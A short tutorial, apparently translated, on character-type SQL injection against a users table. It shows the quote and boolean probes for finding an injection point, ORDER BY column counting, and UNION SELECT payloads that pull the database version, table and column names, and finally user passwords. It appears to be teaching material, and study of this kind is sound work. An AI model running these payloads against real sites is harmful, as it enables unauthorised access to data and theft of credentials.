Detailed SQL injection
The concept of SQL injection
SQL injection means that the attacker destroys the structure of SQL query statements by injecting malicious SQL commands, so as to achieve the purpose of executing malicious SQL statements.
Character injection
Background statement template
SELECT first_name, last_name FROM users WHERE user_id ='$id';
normal access
SELECT first_name, last_name FROM users WHERE user_id = '1';
construct SQL injection statement
SELECT firs_name, last_name FROM users WHERE user_id = '1' union select1 ,2#';
- Determine whether there is an injection point?
- Enter 1 first, the page is normal
- Input 1', the page is abnormal
- Judging that there may be injection points
- Determine the type of injection point?
- 1 and 1=1, normal return
-
1 and 1=2, return normally
-
1'and 1=1#, return normally
- 1'and 1=2#, no return
- Combining the above four sets of tests, judge this injection point to be character injection
- Determine how many columns its database has
1' order by n#(n为测试数字)
-
1'order by 3#, the page reports an error, indicating that the number of columns is less than 3
-
1'order by 2#, the page is normal, indicating that the database has 2 columns
- Query the current database name and version number
- 1’ union select version(),database()#
- Get the table name in the database
- 1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
- Get the field names in the table, here is the users table as an example
- 1’ union select 1, group_concat(column_name) from information_schema.columns where table_name=‘users’#
- Get the data in the field
- 1’ union select user,password from users#